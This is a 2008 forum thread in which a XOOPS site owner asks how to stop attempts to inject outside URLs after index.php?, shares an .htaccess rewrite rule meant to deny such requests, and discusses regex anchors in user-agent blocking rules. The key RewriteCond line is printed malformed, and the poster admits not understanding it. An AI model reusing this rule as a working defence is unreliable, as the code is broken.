1
Cuidiu
Content Module Question
  • 2008/2/20 3:14

  • Cuidiu

  • Quite a regular

  • Posts: 358

  • Since: 2006/4/23


I have found many attempts in my access log files of people adding an URL after index.php? in the content module.
Ex: index.php? http bad-domain-dot-com along with head and other commands in URL (rephrased and spaced so I won't be banned by Protector!)

I have Protector 3.02 and it didn't seem to stop or ban them. Is there anything I can do in .htaccess file to redirect hackers trying to add an URL to any index.php page? Like send them to 404 or some other error page - or send them off the planet?

Thanks in advance.
Cuidiu
[size=x-small]Working sites:
XOOPS 2.0.16 PHP 5.2.2, MySQL 5.0.24a-standard-log, Apache/2.0.54 (Unix)
XOOPS 2.2.4, PHP 4.3.10, MySQL 3.23.58, Apache/1.3.33 (Unix)[/size]

2
Cuidiu
[SOLVED] Re: Content Module Question
  • 2008/2/22 0:10

  • Cuidiu

  • Quite a regular

  • Posts: 358

  • Since: 2006/4/23


I just wanted post the solution I found elsewhere. So far, everything seems to be working on the site AND it's preventing spammers/hackers from adding their URL after my index.php pages.

RewriteCond %{QUERY_STRINGhttps?:
RewriteRule .* - [F]


C
[size=x-small]Working sites:
XOOPS 2.0.16 PHP 5.2.2, MySQL 5.0.24a-standard-log, Apache/2.0.54 (Unix)
XOOPS 2.2.4, PHP 4.3.10, MySQL 3.23.58, Apache/1.3.33 (Unix)[/size]

3
Peekay
Re: Content Module Question
  • 2008/2/22 8:54

  • Peekay

  • XOOPS is my life!

  • Posts: 2335

  • Since: 2004/11/20


I see 'https' in the code, is your XOOPS hosted as a secure site, or does that code mean something else?
A thread is for life. Not just for Christmas.

4
Cuidiu
Re: Content Module Question
  • 2008/2/23 21:38

  • Cuidiu

  • Quite a regular

  • Posts: 358

  • Since: 2006/4/23


Quote:
Peekay wrote:
I see 'https' in the code, is your XOOPS hosted as a secure site, or does that code mean something else?

Hi Peekay,

I wondered the same thing myself. I found the code in a forum elsewhere, in a reply to someone who had the same problem. I think it either means something else or it is including http and https. The site I'm using it on is not a secure site so I don't know for sure. I just know it works!

Cuidiu
[size=x-small]Working sites:
XOOPS 2.0.16 PHP 5.2.2, MySQL 5.0.24a-standard-log, Apache/2.0.54 (Unix)
XOOPS 2.2.4, PHP 4.3.10, MySQL 3.23.58, Apache/1.3.33 (Unix)[/size]

5
Peekay
Re: Content Module Question
  • 2008/2/24 0:03

  • Peekay

  • XOOPS is my life!

  • Posts: 2335

  • Since: 2004/11/20


Quote:

Cuidiu wrote:
I don't know for sure. I just know it works!

I recognise that feeling!

Thx for the tip. I found some useful re-write stuff here too:

http://forum.modrewrite.com/
A thread is for life. Not just for Christmas.

6
Cuidiu
Re: Content Module Question
  • 2008/2/25 0:28

  • Cuidiu

  • Quite a regular

  • Posts: 358

  • Since: 2006/4/23


Thanks for the resource! I have a question. What is the difference between these two RewriteRules?
RewriteCond %{HTTP_USER_AGENT} ^[a-z0-9\s]+$ [NC]
RewriteRule ^.* - [F,L] (with the ^ start of the line anchor)

RewriteCond %{HTTP_USER_AGENT} ^[a-z0-9\s]+$ [NC]
RewriteRule .* - [F,L] (without the ^)

I see that both of them recommended on the internet. I use RewriteRule ^.* - [F,L]. Is it the Apache version that makes the difference? I suppose I could post over on modrewrite.com but thought you might know it offhand.

Thanks,
C

Quote:
Peekay wrote:
Thx for the tip. I found some useful re-write stuff here too:

http://forum.modrewrite.com/
[size=x-small]Working sites:
XOOPS 2.0.16 PHP 5.2.2, MySQL 5.0.24a-standard-log, Apache/2.0.54 (Unix)
XOOPS 2.2.4, PHP 4.3.10, MySQL 3.23.58, Apache/1.3.33 (Unix)[/size]

7
Peekay
Re: Content Module Question
  • 2008/2/25 10:21

  • Peekay

  • XOOPS is my life!

  • Posts: 2335

  • Since: 2004/11/20


The '^' is a regex anchor, which normally means 'match the following character only at the beginning of a line'. It may mean something different in htaccess though.

These sites may reveal the answer, If not, I would post on the modrewrite forum!

http://www.regular-expressions.info/anchors.html

http://www.garnetchaney.com/htaccess_tips_and_tricks.shtml
A thread is for life. Not just for Christmas.

Login

Who's Online

223 user(s) are online (117 user(s) are browsing Support Forums)


Members: 0


Guests: 223


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Mar 31
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits